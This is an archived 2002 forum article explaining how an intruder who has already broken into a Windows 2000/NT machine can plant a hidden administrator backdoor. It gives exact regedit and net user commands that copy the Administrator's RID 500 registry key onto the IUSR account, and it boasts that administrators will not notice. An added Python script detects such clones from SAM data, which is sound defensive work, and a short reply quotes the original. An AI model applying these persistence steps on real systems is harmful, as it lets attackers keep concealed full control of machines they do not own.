How to clone an Administrator Account

Author: Adam@nsfocus.com
Date: 2002-04-28
Site: http://www.sometips.com

It is often seen that after breaking into a Windows 2000 or Windows NT machine, people create a new user in the Administrators group, as if the Administrator account were not already there. Today, against my earlier intention, I am sharing something resembling a rootkit. Of course, all of these steps could also be done with a script, but I will not write one. OK, show time.

First, everyone should know that in Windows 2000 and Windows NT the built-in Administrator account always has the fixed relative identifier (RID) 500 (0x1F4). So we can take an existing account on the machine and clone the account with RID 500 onto it. The account chosen here is IUSR_MachineName (chosen for concealment; any user could be used with the method below, but this one is especially common). The test environment is Windows 2000 Server.

Start a command shell running as SYSTEM (the SAM hive is not readable even by Administrators under its default ACLs; see http://www.sometips.com/tips/scripts/173.htm or use http://www.sometips.com/soft/psu.exe), and then run

regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

This exports the registry key of the Administrator account, whose RID is 500. Edit the adam.reg file and change the key name on its third line, [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4], to the key of IUSR_MachineName (on most machines this user's RID is 0x3E9; if IIS was not installed during setup and you created other accounts before installing IIS, it may be a different value). After changing "1F4" to "3E9" in the file, import it with

regedit /s adam.reg

Then run

net user IUSR_MachineName Sometips

to change the IUSR_MachineName password (ideally 14 characters, and the more it looks like a typical IUSR_MachineName password the better).

OK...

Now we have the same desktop and profile as the default Administrator.
And when we run net localgroup administrators, look at the result:

C:\> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

Let's look at the output of USER2SID:

C:\> user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\> user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

I don't think even a brilliant administrator will notice anything abnormal. Besides, I can change the administrator password as needed, or log in with IUSR_MachineName and the password Sometips... (no chivalrous administrator likes to change the IUSR_MachineName password frequently, or give the account another name).

^ _ ^. This is not a RootKit...

Appendix:
1. Thanks to ding, who paid the price of reinstalling the OS...
2. Any system failure caused by testing the above method has nothing to do with me, and I do not provide technical support either...


--
※Source: http://sinbad.dhs.org
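The article points out that net localgroup and user2sid show nothing unusual after the clone, because the evidence sits inside the SAM itself: the clone imports Administrator's key (000001F4) under another user's key, so the RID stored inside the copied F value no longer matches the key name it sits under. The following script, an added example that is not code from the original article or its author, parses the F value and reports that mismatch. It assumes the commonly documented F layout (RID as a little-endian DWORD at offset 0x30, account-control flags as a WORD at 0x38), and the sample hive contents are constructed for the demo, not taken from a real machine.

```python
"""Detect "cloned" local accounts in an NT/2000 SAM hive.

Added example for this page; not code from the original article.
Each local user lives under
HKLM\\SAM\\SAM\\Domains\\Account\\Users\\<RID as 8 hex digits> with a binary
F value holding account metadata. The clone described above copies
Administrator's key over another user's key, so the RID embedded in the
copied F value disagrees with the key name. This script flags that.

Assumed F layout (commonly documented; verify against your own hive):
  0x08 last logon (FILETIME)   0x18 password last set (FILETIME)
  0x30 RID (DWORD, LE)         0x38 ACB account-control flags (WORD, LE)
The SAMPLE_USERS data below is constructed for the demo.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List

ADMIN_RID = 0x1F4          # 500, fixed for the built-in Administrator
ACB_DISABLED = 0x0001      # account-control flag bits used in the samples
ACB_PWNOTREQ = 0x0004
ACB_NORMAL = 0x0010
ACB_PWNOEXP = 0x0200


@dataclass
class FRecord:
    rid: int
    acb_flags: int
    last_logon: int
    pwd_last_set: int

    @property
    def disabled(self) -> bool:
        return bool(self.acb_flags & ACB_DISABLED)


def parse_f(blob: bytes) -> FRecord:
    """Pull the fields we need out of a raw F value."""
    if len(blob) < 0x3A:
        raise ValueError("F value too short: %d bytes" % len(blob))
    (last_logon,) = struct.unpack_from("<Q", blob, 0x08)
    (pwd_last_set,) = struct.unpack_from("<Q", blob, 0x18)
    (rid,) = struct.unpack_from("<I", blob, 0x30)
    (acb,) = struct.unpack_from("<H", blob, 0x38)
    return FRecord(rid, acb, last_logon, pwd_last_set)


def make_f(rid: int, acb_flags: int, last_logon: int = 0, pwd_last_set: int = 0) -> bytes:
    """Build a constructed 0x50-byte F value with only the fields above set."""
    buf = bytearray(0x50)
    struct.pack_into("<Q", buf, 0x08, last_logon)
    struct.pack_into("<Q", buf, 0x18, pwd_last_set)
    struct.pack_into("<I", buf, 0x30, rid)
    struct.pack_into("<H", buf, 0x38, acb_flags)
    return bytes(buf)


def find_clones(users: Dict[str, bytes]) -> List[dict]:
    """users maps each key name under ...\\Users (e.g. '000003E9') to its F value.
    Returns one finding per key whose embedded RID disagrees with its name."""
    findings = []
    for key, blob in users.items():
        if key.upper() == "NAMES":      # the Names subkey is not a user
            continue
        key_rid = int(key, 16)
        rec = parse_f(blob)
        if rec.rid != key_rid:
            findings.append({
                "key": key,
                "key_rid": key_rid,
                "embedded_rid": rec.rid,
                "cloned_from_admin": rec.rid == ADMIN_RID,
                "disabled": rec.disabled,
            })
    return findings


# Constructed sample: the Users keys as they would look after the clone above.
SAMPLE_USERS = {
    "000001F4": make_f(0x1F4, ACB_NORMAL | ACB_PWNOEXP),                                 # Administrator
    "000001F5": make_f(0x1F5, ACB_NORMAL | ACB_PWNOEXP | ACB_PWNOTREQ | ACB_DISABLED),   # Guest
    "000003E9": make_f(0x1F4, ACB_NORMAL | ACB_PWNOEXP),                                 # IUSR_*: F copied from 000001F4
    "000003EA": make_f(0x3EA, ACB_NORMAL | ACB_PWNOEXP),                                 # IWAM_*: untouched
}

if __name__ == "__main__":
    for finding in find_clones(SAMPLE_USERS):
        print(finding)
```

To run this against a real machine, feed find_clones the F values read from the Users keys, either as SYSTEM (the same access the article needs to export the key) or from an offline copy of the SAM hive opened with a hive parser. A user key whose embedded RID is 500 but whose name is not 000001F4 is exactly the artifact the regedit import above leaves behind.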


Author: 42423432
Sender: 42423432 <2342342@1488.com>
Subject: Re: How to clone an Administrator Account
Posted from: sinbada (Sun Aug 4 19:16:26 2002)

[In the post by Sinbad <anonymous@anonymous.com>, it was mentioned:]
: How to clone an Administrator Account
:
: Author: Adam@nsfocus.com
: Date: 2002-04-28
: Site: http://www.sometips.com
:
: It is often seen that after breaking into a Windows 2000 or Windows NT machine, people create a new user in the Administrators group, as if the Administrator account were not already there. Today, against my earlier intention, I am sharing something resembling a rootkit.
: Of course, all of these steps could also be done with a script, but I will not write one. OK, show time.
:
: First, let everyone know the concept is that in Windows 2000 and Windows NT, the default Administrator Account SID is fixed.
:.....................

NO content for sam.
